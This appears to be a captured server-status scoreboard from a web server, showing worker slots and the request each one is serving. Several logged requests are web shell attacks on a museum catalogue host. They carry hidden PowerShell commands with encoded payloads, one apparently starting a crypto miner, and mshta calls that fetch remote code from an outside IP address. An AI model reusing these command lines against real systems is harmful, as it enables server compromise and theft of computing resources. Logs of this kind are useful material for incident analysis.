S618753123 ms0 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20bABzACAAZAA6AFwA&pwd=asicanv8aw&l=-1 HTTP/1.1
S618512620 ms0 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20ZAA6AFwAXAB4AG0AcgBpAGcALgBlAHgAZQAgAC0AbwAgAHAAbwBvAGwALgBtAGkAbgBlAHgAbQByAC4AYwBvAG0AOgA0ADQAMwAgAC0AdQAgADgAMwBEADMANwBnAFgAdgBCAHEAVwBHAGcAWABnAGYASABmAHIANQBVAG4AMQBxAGEAUQBxAFUAYQBFAGgAWgB0AGcAZgBLAFgAZwBlAEwAVwBZAFYAdwAzAEwATABkAEMATQBjAHMAdABIAFEAQQA0AHoAbQB3AGIAYwByADcAbwBqADIAdABOADIARgBmAHgAVABqAGMAcABOAHgAeQA3AFgAcgA5AFEARQBNAFMAUQAxAEYAUwB0AHEAaQAgAC0AawAgAC0AdAAgADEAIAAtAC0AdABsAHMAIAAtAC0AcgBpAGcALQBpAGQAIABqAGIAXwA5AA==&pwd=asicanv8aw&l=15 HTTP/1.1
S618269902 ms0 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S315147061 ms0 KB0 KB1.36.182.189catalogo.museolazarogaldiano.esGET /shell/shell.jsp?ppp=mshta%20http://81.70.213.71:1444/ HTTP/1.1
S315080151 ms0 KB0 KB1.36.182.189catalogo.museolazarogaldiano.esGET /shell/shell.jsp?ppp=mshta%20http://81.70.213.71:1444/ HTTP/1.1
S315048639 ms0 KB0 KB1.36.182.189catalogo.museolazarogaldiano.esGET /shell/shell.jsp?ppp=mshta%20http://81.70.213.71:1444/ HTTP/1.1
S314530418 ms0 KB0 KB1.36.182.189catalogo.museolazarogaldiano.esGET /shell/shell.jsp?ppp=mshta%20http://81.70.213.71:1444/ HTTP/1.1
S315012167 ms0 KB0 KB1.36.182.189catalogo.museolazarogaldiano.esGET /shell/shell.jsp?ppp=mshta%20http://81.70.213.71:1444/ HTTP/1.1
S312068084 ms0 KB0 KB1.36.182.189catalogo.museolazarogaldiano.esGET /shell/shell.jsp?ppp=mshta%20http://81.70.213.71:1444/ HTTP/1.1
R??????
S314861127 ms0 KB0 KB1.36.182.189catalogo.museolazarogaldiano.esGET /shell/shell.jsp?ppp=mshta%20http://81.70.213.71:1444/ HTTP/1.1
S314951639 ms0 KB0 KB1.36.182.189catalogo.museolazarogaldiano.esGET /shell/shell.jsp?ppp=mshta%20http://81.70.213.71:1444/ HTTP/1.1
S315214031 ms0 KB0 KB1.36.182.189catalogo.museolazarogaldiano.esGET /shell/shell.jsp?ppp=mshta%20http://81.70.213.71:1444/ HTTP/1.1
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
S572 ms32 KB0 KB3.238.186.43catalogo.museolazarogaldiano.esGET /status HTTP/1.1
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????

P: Parse and prepare request S: Service F: Finishing R: Ready K: Keepalive